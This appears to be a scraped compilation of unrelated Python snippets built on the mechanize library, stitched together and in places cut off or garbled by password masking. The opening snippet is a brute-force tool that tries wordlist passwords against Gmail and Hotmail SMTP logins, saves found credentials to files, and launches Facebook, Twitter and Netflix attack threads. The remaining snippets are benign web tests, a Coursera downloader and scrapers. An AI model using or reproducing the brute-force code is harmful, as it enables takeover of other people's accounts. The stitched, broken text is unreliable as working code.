        'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.19) Gecko/20081202 Firefox (Debian-2.0.0.19-0etch1)',
        'Opera/9.80 (J2ME/MIDP; Opera Mini/9.80 (S60; SymbOS; Opera Mobi/23.348; U; en) Presto/2.5.25 Version/10.54',
        'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.12 Safari/535.11',
        'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.6 (KHTML, like Gecko) Chrome/16.0.897.0 Safari/535.6'
    ]
    brows.addheaders = [('User-agent', random.choice(useragents))]
    brows.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),
                             max_time=1)
    proxyList = options.proxy
    if options.gmail == None:
        if options.hotmail == None:
            if options.twitter == None:
                if facebook == None:
                    if options.netflix == None:
                        print(use.usage)
                        exit()
        elif options.hotmail != None or options.gmail == None:
            smtp_srverH = smtplib.SMTP('smtp.live.com', 587)
            smtp_srverH.ehlo()
            smtp_srverH.starttls()
            if options.password != None or options.list_password == None:
                print("<<<<<<+++++Start  Attacking Email+++++>>>>>")
                try:
                    smtp_srverH.login(options.hotmail, options.password)
                    print("Found Password :{} \t Found Hotmail:{}".format(
                        options.password, options.hotmail))
                    Save = io.open(
                        "Hotmail.txt",
                        "a").write("Account Hotmail:" + options.hotmail +
                                   "\t\tPassword:"******"\n")
                except:
                    print("Not Found Password : {} \t Email Hotmail:{}".format(
                        options.password, options.hotmail))
            elif options.list_password != None or options.password == None:
                password_list = io.open(options.list_password, "r").readlines()
                for password in password_list:
                    try:
                        print("<<<<<<+++++Start  Attacking Email+++++>>>>>")
                        smtp_srverH.login(options.hotmail, password)
                        print("FOUND Password :{} \n Found Hotmail:{}".format(
                            password, options.hotmail))
                        Save = io.open(
                            "Hotmail.txt",
                            "a").write("Account Hotmail:" + options.hotmail +
                                       "\t\tPassword:"******"\n")
                    except smtplib.SMTPAuthenticationError:
                        print("Not Found Password : {} \t Email Hotmail:{}".
                              format(password, options.hotmail))
        if options.twitter != None:
            hejab = threading.Thread(target=twitter, name="hejab")
            hejab.start()
        if options.facebook != None:
            facebook(brows)
        if options.netflix != None:
            netflix = threading.Thread(target=Netflix, name="Netflix")
            netflix.start()

    elif options.gmail != None or options.hotmail == None or options.twitter == None:
        smtp_srverG = smtplib.SMTP('smtp.gmail.com', 587)
        smtp_srverG.ehlo()
        smtp_srverG.starttls()
        if options.password != None or options.list_password == None:
            print("%s<<<<<<+++++Start  Attacking Email+++++>>>>>%s" % (R, W))
            try:
                smtp_srverG.login(options.gmail, options.password)
                print("Found Password :{} \t Found Gmail:{}".format(
                    options.password, options.gmail))
                Save = io.open("Gmail.txt",
                               "a").write("Account Gmail:" + options.gmail +
                                          "\t\tPassword:"******"\n")
            except:
                print("Not Found Password : {} \t Email Gmail:{}".format(
                    options.password, options.gmail))
        elif options.list_password != None:
            password_list = io.open(options.list_password, "r").readlines()
            for password in password_list:
                password = password.rstrip("\n")
                print("<<<<<<+++++Start  Attacking Email+++++>>>>>")
                try:
                    smtp_srverG.login(options.gmail, password)
                    print("{}<<<+++Found Password :{} \t Found Gmail:{}+++>>>".
                          format(G, password, options.gmail))
                    Save = io.open("Gmail.txt",
                                   "a").write("Account Gmail:" +
                                              options.gmail + "\t\tPassword:"******"\n")
                    break
                except smtplib.SMTPAuthenticationError:
                    print(
                        "{}<<<---Not Found Password : {} \t Email Gmail:{}--->>>"
                        .format(R, password, options.gmail))

    else:
        print(use.usage)
        exit()
Example #38
0
    def __init__(self, *args, **kwargs):
        self._clone_actions = {}

        B.__init__(self, *args, **kwargs)
        self.set_cookiejar(CookieJar())
Example #39
0
def getSolutions(path_prefix, path_proxy):
    global br, username, password

    # create a browser object
    br = Browser()

    # add proxy support to browser
    if len(path_proxy) != 0:
        protocol, proxy = options.proxy.split("://")
        br.set_proxies({protocol: proxy})

    # let browser fool robots.txt
    br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; \
              rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]
    br.set_handle_robots(False)

    print "Enter yout SPOJ username :"******"Authenticating " + username
    br.open("http://spoj.com/")
    for form in br.forms():
        if form.attrs['id'] == 'login-form':
            br.form = form
            break
    br["login_user"] = username
    br["password"] = password

    # sign in for a day to avoid timeouts
    br.find_control(name="autologin").selected = True
    br.form.action = "http://www.spoj.com"
    response = br.submit()

    verify = response.read()
    if (verify.find("Authentication failed!") != -1):
        print "Error authenticating - " + username
        exit(0)

    # grab the signed submissions list
    print "Grabbing siglist for " + username
    siglist = br.open("http://www.spoj.com/status/" + username + "/signedlist")

    # dump first nine useless lines in signed list for formatting
    for i in xrange(9):
        siglist.readline()

    # make a list of all AC's and challenges
    print "Filtering siglist for AC/Challenge solutions..."
    mysublist = list()

    while True:
        temp = siglist.readline()

        if temp == '\------------------------------------------------------------------------------/\n':
            # reached end of siglist
            break

        if not len(temp):
            print "Reached EOF, siglist format has probably changed," + \
                    " contact author."
            exit(1)

        entry = [x.strip() for x in temp.split('|')]

        if entry[4] == 'AC' or entry[4].isdigit():
            mysublist.append(entry)

    print "Done !!!"
    return mysublist
    #print soup
    #print year
    tables = soup.findChildren('table')
    table = tables[4]
    for row in table.findAll('tr'):
        h3 = row.findAll('h3')
        name = h3[0].string
        print name
        td = row.findAll('td')
        role = td[2].string
        print role
        #cover_link = col[3].img['src']
        record = (str(year), name, role)
        print "|".join(record)

mech = Browser()
url = "http://europa.eu/whoiswho/public/index.cfm?fuseaction=idea.hierarchy&nodeID=370629&personID=150128&lang=en"
page1 = mech.open(url)
html1 = page1.read()
soup1 = BeautifulSoup(html1)
extract(soup1, 2007)
#page2 = mech.follow_link(text_regex="Next")
#html2 = page2.read()
#soup2 = BeautifulSoup(html2)
#extract(soup2, 2006)import scraperwiki

#From http://palewi.re/posts/2008/04/20/python-recipe-grab-a-page-scrape-a-table-download-a-file/

#!/usr/bin/env python
from mechanize import Browser
from BeautifulSoup import BeautifulSoup
    def test_select_records_per_group(self):
        """webuser - test of user preferences setting"""

        # logging in as admin
        browser = Browser()
        browser.open(CFG_SITE_SECURE_URL + "/youraccount/login")
        browser.select_form(nr=0)
        browser['nickname'] = 'admin'
        browser['password'] = ''
        browser.submit()

        expected_response = "You are logged in as admin"
        login_response_body = browser.response().read()
        try:
            login_response_body.index(expected_response)
        except ValueError:
            self.fail("Expected to see %s, got %s." % \
                      (expected_response, login_response_body))

        # Going to edit page and setting records per group to 20
        browser.open(CFG_SITE_SECURE_URL +
                     "/youraccount/edit/WebSearchSettings")
        browser.select_form(nr=0)
        browser['rg'] = ["25"]
        browser.submit()

        expected_response = "Data has been saved."
        changed_settings_body = browser.response().read()
        try:
            changed_settings_body.index(expected_response)
        except ValueError:
            self.fail("Expected to see %s, got %s." % \
                      (expected_response, changed_settings_body))

        # Going to the search page, making an empty search
        browser.open(CFG_SITE_SECURE_URL)
        browser.select_form(name="search")
        browser.submit()
        expected_response = "1 to 25"
        records_found_body = browser.response().read()
        try:
            records_found_body.index(expected_response)
        except ValueError:
            self.fail("Expected to see %s, got %s." % \
                      (expected_response, records_found_body))

        # Going again to edit and setting records per group back to 10
        browser.open(CFG_SITE_SECURE_URL +
                     "/youraccount/edit/WebSearchSettings")
        browser.select_form(name="edit")
        browser['rg'] = ["10"]
        browser.submit()

        expected_response = "Data has been saved."
        changed_settings_body = browser.response().read()
        try:
            changed_settings_body.index(expected_response)
        except ValueError:
            self.fail("Expected to see %s, got %s." % \
                      (expected_response, changed_settings_body))

        # Logging out!
        browser.open(CFG_SITE_SECURE_URL + "/youraccount/logout")
        expected_response = "You are no longer recognized"
        logout_response_body = browser.response().read()
        try:
            logout_response_body.index(expected_response)
        except ValueError:
            self.fail("Expected to see %s, got %s." % \
                      (expected_response, logout_response_body))

        # Logging in again
        browser.open(CFG_SITE_SECURE_URL + "/youraccount/login")
        browser.select_form(nr=0)
        browser['nickname'] = 'admin'
        browser['password'] = ''
        browser.submit()

        expected_response = "You are logged in as admin"
        login_response_body = browser.response().read()
        try:
            login_response_body.index(expected_response)
        except ValueError:
            self.fail("Expected to see %s, got %s." % \
                      (expected_response, login_response_body))

        # Let's go to search and check that the setting is still there
        browser.open(CFG_SITE_SECURE_URL)
        browser.select_form(name="search")
        browser.submit()
        expected_response = "1 to 10"
        records_found_body = browser.response().read()
        try:
            records_found_body.index(expected_response)
        except ValueError:
            self.fail("Expected to see %s, got %s." % \
                      (expected_response, records_found_body))

        return
class Lime(Torrent):
    def __init__(self, otherFilters, minSize, debug):
        self._urlBase = "https://www.limetorrents.cc"
        self._urlSearch = u"https://www.limetorrents.cc/search/all/{name} {episode}"
        self._languageDict = {"english": 2, "spanish": 14}
        #To MB
        self._minSize = int(minSize) / 1048576
        self._debug = debug
        extraFilters = u"{otherFilters}"
        if otherFilters != "":
            self._otherFilers = u" " + otherFilters

        else:
            self._otherFilers = ""

        self._urlSearch = ''.join([
            self._urlSearch,
            extraFilters.format(otherFilters=self._otherFilers), '/seeds/1/'
        ])
        self._browser = Browser()
        self._browser.set_handle_robots(False)
        self._cookieJar = cookielib.LWPCookieJar()
        self._browser.set_cookiejar(self._cookieJar)
        self._browser.addheaders = [(
            'User-agent',
            'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0'
        ), ('Accept', '*/*'), ('Accept-Encoding', "gzip,deflate")]
        self._browser.open(self._urlBase)

    def episodeSearch(self, serie, episode):
        searchQuery = self._urlSearch.format(
            name=serie, episode=episode["number"]).replace(" ", "-")
        logging.debug(u"searchURL: {}".format(searchQuery))
        try:
            self._browser.open(searchQuery)
            gzipContent = self._browser.response().read()
            html = gzip.GzipFile(fileobj=StringIO.StringIO(gzipContent)).read()
            #Scrapping the page.
            soup = BeautifulSoup(html)
            if (soup.body.findAll(text='No results found')):
                logging.error(
                    u"There wasn't results for: {}".format(searchQuery))
                return None

            items = soup.findAll('table', {"class": "table2"})[1].findAll('tr')
            #We skip the first tr because is the header. (no tbody in html).
            for item in items[1:]:
                #print item
                #print item.findAll("td" ,{"class": "tdnormal"})
                contentLength = item.findAll(
                    "td", {"class": "tdnormal"})[1].text.split(' ')
                if contentLength[1][:2] != 'GB' and float(
                        contentLength[0]) < self._minSize:
                    logging.warning(u"Torrent to small: {}".format(' '.join(
                        [contentLength[0], contentLength[1][:2]])))
                    continue

                linkA = item.find("div", {"class": "tt-name"}).findAll("a")[1]
                infoUrl = linkA['href']
                name = linkA.text
                logging.info(u"Going to download: {}".format(name))
                logging.info(u"File size: {}".format(' '.join(
                    [contentLength[0], contentLength[1][:2]])))
                self._browser.open(''.join([self._urlBase, infoUrl]))
                gzipContent = self._browser.response().read()
                html = gzip.GzipFile(
                    fileobj=StringIO.StringIO(gzipContent)).read()
                soup2 = BeautifulSoup(html)
                #TODO:
                posibleLinks = soup2.findAll('div', {'class': 'downloadarea'})
                for link in posibleLinks:
                    href = link.find('a')['href']
                    if href[0:7] == 'magnet:':
                        return href
                        break

            return None
        except HTTPError, e:
            logging.error(
                u"There was an error in the URL {}.".format(searchQuery))
            return None
Example #43
0
from BeautifulSoup import BeautifulSoup, SoupStrainer
import sys
print sys.stdout.encoding

import re
from mechanize import Browser

f=open("ips2", "r")
br = Browser()
br.set_handle_robots(False)
br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]

for line in f:
	url="http://www.geoiptool.com/es/?IP="+line
	print url
	response=br.open(url)
	data = response.read() 
	for item in data.split("\n"):
		if "flag" in item and "class" in item:		
			print item
    def test_password_setting(self):
        """webuser - check password settings"""
        browser = Browser()
        browser.open(CFG_SITE_SECURE_URL + "/youraccount/login")
        browser.select_form(nr=0)
        browser['nickname'] = 'admin'
        browser['password'] = ''
        browser.submit()

        expected_response = "You are logged in as admin"
        login_response_body = browser.response().read()
        try:
            login_response_body.index(expected_response)
        except ValueError:
            self.fail("Expected to see %s, got %s." % \
                      (expected_response, login_response_body))

        # Going to set new password from "" to "123"
        browser.open(CFG_SITE_SECURE_URL + "/youraccount/edit")
        browser.select_form(name="edit_password")
        browser['old_password'] = ""
        browser['password'] = "******"
        browser['password2'] = "123"
        browser.submit()
        expected_response = "Password successfully edited"
        change_password_body = browser.response().read()
        try:
            change_password_body.index(expected_response)
        except ValueError:
            self.fail("Expected to see %s, got %s." % \
                    (expected_response, change_password_body))

        # Going to set a wrong old password
        browser.open(CFG_SITE_SECURE_URL + "/youraccount/edit")
        browser.select_form(name="edit_password")
        browser['old_password'] = "******"
        browser['password'] = "******"
        browser['password2'] = "123"
        browser.submit()
        expected_response = "Wrong old password inserted"
        change_password_body = browser.response().read()
        try:
            change_password_body.index(expected_response)
        except ValueError:
            self.fail("Expected to see %s, got %s." % \
                    (expected_response, change_password_body))

        # Going to put different new passwords
        browser.open(CFG_SITE_SECURE_URL + "/youraccount/edit")
        browser.select_form(name="edit_password")
        browser['old_password'] = "******"
        browser['password'] = "******"
        browser['password2'] = "321"
        browser.submit()
        expected_response = "Both passwords must match"
        change_password_body = browser.response().read()
        try:
            change_password_body.index(expected_response)
        except ValueError:
            self.fail("Expected to see %s, got %s." % \
                    (expected_response, change_password_body))

        # Reset the situation
        browser.open(CFG_SITE_SECURE_URL + "/youraccount/edit")
        browser.select_form(name="edit_password")
        browser['old_password'] = "******"
        browser['password'] = ""
        browser['password2'] = ""
        browser.submit()
        expected_response = "Password successfully edited"
        change_password_body = browser.response().read()
        try:
            change_password_body.index(expected_response)
        except ValueError:
            self.fail("Expected to see %s, got %s." % \
                    (expected_response, change_password_body))
Example #45
0
    def on_task_start(self, task, config):
        try:
            from mechanize import Browser
        except ImportError:
            raise PluginError('mechanize required (python module), please install it.', log)

        userfield = config.get('userfield', 'username')
        passfield = config.get('passfield', 'password')

        url = config['url']
        username = config['username']
        password = config['password']

        br = Browser()
        br.set_handle_robots(False)
        try:
            br.open(url)
        except Exception as e:
            # TODO: improve error handling
            raise PluginError('Unable to post login form', log)

        #br.set_debug_redirects(True)
        #br.set_debug_responses(True)
        #br.set_debug_http(True)

        for form in br.forms():
            loginform = form

            try:
                loginform[userfield] = username
                loginform[passfield] = password
                break
            except Exception as e:
                pass
        else:
            received = os.path.join(task.manager.config_base, 'received')
            if not os.path.isdir(received):
                os.mkdir(received)
            filename = os.path.join(received, '%s.formlogin.html' % task.name)
            f = open(filename, 'w')
            f.write(br.response().get_data())
            f.close()
            log.critical('I have saved the login page content to %s for you to view' % filename)
            raise PluginError('Unable to find login fields', log)

        br.form = loginform

        br.submit()

        cookiejar = br._ua_handlers["_cookies"].cookiejar

        # Add cookiejar to our requests session
        task.requests.add_cookiejar(cookiejar)
        # Add handler to urllib2 default opener for backwards compatibility
        handler = urllib2.HTTPCookieProcessor(cookiejar)
        if urllib2._opener:
            log.debug('Adding HTTPCookieProcessor to default opener')
            urllib2._opener.add_handler(handler)
        else:
            log.debug('Creating new opener and installing it')
            urllib2.install_opener(urllib2.build_opener(handler))
    def test_email_caseless(self):
        """webuser - check email caseless"""
        browser = Browser()
        browser.open(CFG_SITE_SECURE_URL + "/youraccount/register")
        browser.select_form(nr=0)
        browser['email'] = '*****@*****.**'
        browser['nickname'] = 'foobar'
        browser['password'] = '******'
        browser['password2'] = '123456'
        browser.submit()

        expected_response = "Account created"
        login_response_body = browser.response().read()
        try:
            login_response_body.index(expected_response)
        except ValueError:
            self.fail("Expected to see %s, got %s." % \
                      (expected_response, login_response_body))

        browser = Browser()
        browser.open(CFG_SITE_SECURE_URL + "/youraccount/register")
        browser.select_form(nr=0)
        browser['email'] = '*****@*****.**'
        browser['nickname'] = 'foobar2'
        browser['password'] = '******'
        browser['password2'] = '123456'
        browser.submit()

        expected_response = "Registration failure"
        login_response_body = browser.response().read()
        try:
            login_response_body.index(expected_response)
        except ValueError:
            self.fail("Expected to see %s, got %s." % \
                      (expected_response, login_response_body))

        browser = Browser()
        browser.open(CFG_SITE_SECURE_URL + "/youraccount/register")
        browser.select_form(nr=0)
        browser['email'] = '*****@*****.**'
        browser['nickname'] = 'foobar2'
        browser['password'] = '******'
        browser['password2'] = '123456'
        browser.submit()

        expected_response = "Registration failure"
        login_response_body = browser.response().read()
        try:
            login_response_body.index(expected_response)
        except ValueError:
            self.fail("Expected to see %s, got %s." % \
                      (expected_response, login_response_body))
Example #47
0
class CourseraDownloader(object):
    """
    Class to download content (videos, lecture notes, ...) from coursera.org for
    use offline.

    https://github.com/dgorissen/coursera-dl
    """

    BASE_URL =    'http://class.coursera.org/%s'
    HOME_URL =    BASE_URL + '/class/index'
    LECTURE_URL = BASE_URL + '/lecture/index'
    LOGIN_URL =   BASE_URL + '/auth/auth_redirector?type=login&subtype=normal'
    QUIZ_URL =    BASE_URL + '/quiz/index'

    DEFAULT_PARSER = "lxml"

    def __init__(self,username,password,parser=DEFAULT_PARSER):
        """Requires your coursera username and password. 
        You can also specify the parser to use (defaults to lxml), see http://www.crummy.com/software/BeautifulSoup/bs4/doc/#installing-a-parser
        """
        self.username = username
        self.password = password
        self.parser = parser

        self.browser = Browser()
        self.browser.set_handle_robots(False)

    def login(self,course_name):
        print "* Authenticating as %s..." % self.username

        # open the course login page
        page = self.browser.open(self.LOGIN_URL % course_name)

        # check if we are already logged in by checking for a password field
        bs = BeautifulSoup(page,self.parser)
        pwdfield = bs.findAll("input",{"id":"password_login"})

        if pwdfield:
            self.browser.form = self.browser.forms().next()
            self.browser['email'] = self.username
            self.browser['password'] = self.password
            r = self.browser.submit()

            # check that authentication actually succeeded
            bs2 = BeautifulSoup(r.read(),self.parser)
            title = bs2.title.string
            if title.find("Login Failed") > 0:
                raise Exception("Failed to authenticate as %s" % (self.username,))
 
        else:
            # no login form, already logged in
            print "* Already logged in"


    def course_name_from_url(self,course_url):
        """Given the course URL, return the name, e.g., algo2012-p2"""
        return course_url.split('/')[3]

    def lecture_url_from_name(self,course_name):
        """Given the name of a course, return the video lecture url"""
        return self.LECTURE_URL % course_name

    def get_downloadable_content(self,course_url):
        """Given the video lecture URL of the course, return a list of all
        downloadable resources."""

        cname = self.course_name_from_url(course_url)

        print "* Collecting downloadable content from " + course_url

        # get the course name, and redirect to the course lecture page
        vidpage = self.browser.open(course_url)

        # extract the weekly classes
        soup = BeautifulSoup(vidpage,self.parser)
        headers = soup.findAll("h3", { "class" : "list_header" })

        weeklyTopics = []
        allClasses = {}

        # for each weekly class
        for header in headers:
            ul = header.findNext('ul')
            sanitisedHeaderName = sanitiseFileName(header.text)
            weeklyTopics.append(sanitisedHeaderName)
            lis = ul.findAll('li')
            weekClasses = {}

            # for each lecture in a weekly class
            classNames = []
            for li in lis:
                className = sanitiseFileName(li.a.text)
                classNames.append(className)
                classResources = li.find('div', {'class': 'item_resource'})

                hrefs = classResources.findAll('a')

                # for each resource of that lecture (slides, pdf, ...)
                # (dont set a filename here, that will be inferred from the headers)
                resourceLinks = [ (h['href'],None) for h in hrefs]
 
                # check if the video is included in the resources, if not, try
                # do download it directly
                hasvid = [x for x,_ in resourceLinks if x.find('.mp4') > 0]
                if not hasvid:
                    ll = li.find('a',{'class':'lecture-link'})
                    lurl = ll['data-lecture-view-link']
                    p = self.browser.open(lurl)
                    bb = BeautifulSoup(p,self.parser)
                    vobj = bb.find('source',type="video/mp4")

                    if not vobj:
                        print " Warning: Failed to find video for %s" %  className
                    else:
                        vurl = vobj['src']
                        # build the matching filename
                        fn = className + ".mp4"
                        resourceLinks.append( (vurl,fn) )

                weekClasses[className] = resourceLinks

            # keep track of the list of classNames in the order they appear in the html
            weekClasses['classNames'] = classNames

            allClasses[sanitisedHeaderName] = weekClasses

        return (weeklyTopics, allClasses)

    def download(self, url, target_dir=".", target_fname=None):
        """Download the url to the given filename"""
        r = self.browser.open(url)

        # get the headers
        headers = r.info()

        # get the content length (if present)
        clen = int(headers['Content-Length']) if 'Content-Length' in headers else -1 
 
        # build the absolute path we are going to write to
        fname = target_fname or sanitiseFileName(CourseraDownloader.getFileName(headers)) or CourseraDownloader.getFileNameFromURL(url)
        filepath = os.path.join(target_dir,fname)

        dl = True
        if os.path.exists(filepath):
            if clen > 0: 
                fs = os.path.getsize(filepath)
                delta = clen - fs

                # all we know is that the current filesize may be shorter than it should be and the content length may be incorrect
                # overwrite the file if the reported content length is bigger than what we have already by at least k bytes (arbitrary)

                # TODO this is still not foolproof as the fundamental problem is that the content length cannot be trusted
                # so this really needs to be avoided and replaced by something else, eg., explicitly storing what downloaded correctly
                if delta > 2:
                    print '    - "%s" seems incomplete, downloading again' % fname
                else:
                    print '    - "%s" already exists, skipping' % fname
                    dl = False
            else:
                # missing or invalid content length
                # assume all is ok...
                dl = False

        try:
            if dl: self.browser.retrieve(url,filepath)
        except Exception as e:
            print "Failed to download url %s to %s: %s" % (url,filepath,e)

    def download_course(self,cname,dest_dir="."):
        """Download all the contents (quizzes, videos, lecture notes, ...) of the course to the given destination directory (defaults to .)"""

        # Ensure we are logged in
        self.login(cname)

        # get the lecture url
        course_url = self.lecture_url_from_name(cname)

        (weeklyTopics, allClasses) = self.get_downloadable_content(course_url)
        print '* Got all downloadable content for ' + cname

        course_dir = os.path.abspath(os.path.join(dest_dir,cname))

        # ensure the target dir exists
        if not os.path.exists(course_dir):
            os.mkdir(course_dir)

        print "* " + cname + " will be downloaded to " + course_dir

        # ensure the course directory exists
        if not os.path.exists(course_dir):
            os.makedirs(course_dir)

        # download the standard pages
        print " - Downloading lecture/syllabus pages"
        self.download(self.HOME_URL % cname,target_dir=course_dir,target_fname="index.html")
        self.download(course_url,target_dir=course_dir,target_fname="lectures.html")

        # commented out because of https://github.com/dgorissen/coursera-dl/issues/2
        # self.download((self.BASE_URL + '/wiki/view?page=syllabus') % cname, target_dir=course_dir,target_fname="syllabus.html")
        # download the quizzes & homeworks
        #for qt in ['quiz','homework']:
        #    print "  - Downloading the '%s' quizzes" % qt
        #    try:
        #        self.download_quizzes(cname,course_dir,quiz_type=qt)
        #    except Exception as e:
        #        print "  - Failed %s" % e

        # now download the actual content (video's, lecture notes, ...)
        for j,weeklyTopic in enumerate(weeklyTopics,start=1):
            if weeklyTopic not in allClasses:
                #print 'Weekly topic not in all classes:', weeklyTopic
                continue

            # ensure the week dir exists
            # add a numeric prefix to the week directory name to ensure chronological ordering
            wkdirname = str(j).zfill(2) + " - " + weeklyTopic
            wkdir = os.path.join(course_dir,wkdirname)
            if not os.path.exists(wkdir):
                os.makedirs(wkdir)

            weekClasses = allClasses[weeklyTopic]
            classNames = weekClasses['classNames']

            print " - " + weeklyTopic

            for i,className in enumerate(classNames,start=1):
                if className not in weekClasses:
                    continue

                classResources = weekClasses[className]

                # ensure the class dir exists
                clsdirname = str(i).zfill(2) + " - " + className
                clsdir = os.path.join(wkdir,clsdirname)
                if not os.path.exists(clsdir): 
                    os.makedirs(clsdir)

                print "  - Downloading resources for " + className

                for classResource,tfname in classResources:
                    if not isValidURL(classResource):
                        absoluteURLGen = AbsoluteURLGen(course_url)
                        classResource = absoluteURLGen.get_absolute(classResource)
                        print "  -" + classResource, ' - is not a valid url'

                        if not isValidURL(classResource):
                            print "  -" + classResource, ' - is not a valid url'
                            continue

                    try:
                       #print '  - Downloading ', classResource
                       self.download(classResource,target_dir=clsdir,target_fname=tfname)
                    except Exception as e:
                       print "    - failed: ",classResource,e


    def download_quizzes(self,course,target_dir,quiz_type="quiz"):
        """Download each of the quizzes as separate html files, the quiz type is
        typically quiz or homework"""

        # extract the list of all quizzes
        qurl = (self.QUIZ_URL + "?quiz_type=" + quiz_type) % course
        p = self.browser.open(qurl)
        bs = BeautifulSoup(p,self.parser)

        qlist = bs.find('div',{'class':'item_list'})
        qurls = [q['href'].replace('/start?','/attempt?') for q in qlist.findAll('a',{'class':'btn primary'})]
        titles = [t.string for t in qlist.findAll('h4')]

        # ensure the target directory exists
        dir = os.path.join(target_dir,quiz_type)

        try:
            os.makedirs(dir)
        except OSError as e:
            if e.errno == errno.EEXIST:
                pass
            else: raise

        # download each one
        for i,it in enumerate(zip(qurls,titles),start=1):
            q,t = it
            fname = os.path.join(dir,str(i).zfill(2) + " - " + sanitiseFileName(t) + ".html")
            if os.path.exists(fname):
                pass
                #print "  - already exists, skipping"
            else:
                self.browser.retrieve(q,fname)

    @staticmethod
    def extractFileName(contentDispositionString):
        #print contentDispositionString
        pattern = 'attachment; filename="(.*?)"'
        m = re.search(pattern, contentDispositionString)
        try:
            return m.group(1)
        except Exception:
            return ''

    @staticmethod
    def getFileName(header):
        try:
            return CourseraDownloader.extractFileName(header['Content-Disposition']).lstrip()
        except Exception:
            return '' 

    @staticmethod
    def getFileNameFromURL(url):
        splits = url.split('/')
        splits.reverse()
        splits = urllib.unquote(splits[0])
        #Seeing slash in the unquoted fragment
        splits = splits.split('/')
        fname = splits[len(splits) - 1]

        # add an extension if none
        ext = os.path.splitext(fname)[1]
        if not ext: fname += ".html"

        return fname
import mechanize
from mechanize import Browser
from bs4 import BeautifulSoup as BS
import json

br = Browser()

# Browser options
# Ignore robots.txt. Do not do this without thought and consideration.
br.set_handle_robots(False)
# Don't add Referer (sic) header
br.set_handle_referer(False)

# Follows refresh 0 but not hangs on refresh > 0
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)

br.set_handle_equiv(True)
br.set_handle_gzip(True)
br.set_handle_redirect(True)

#Setting the user agent
br.addheaders = [(
    'User-agent',
    'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1'
)]

br.open('https://www.linkedin.com/in/shashankgaurav')

#Getting the response in beautifulsoup
soup = BS(br.response().read(), 'lxml')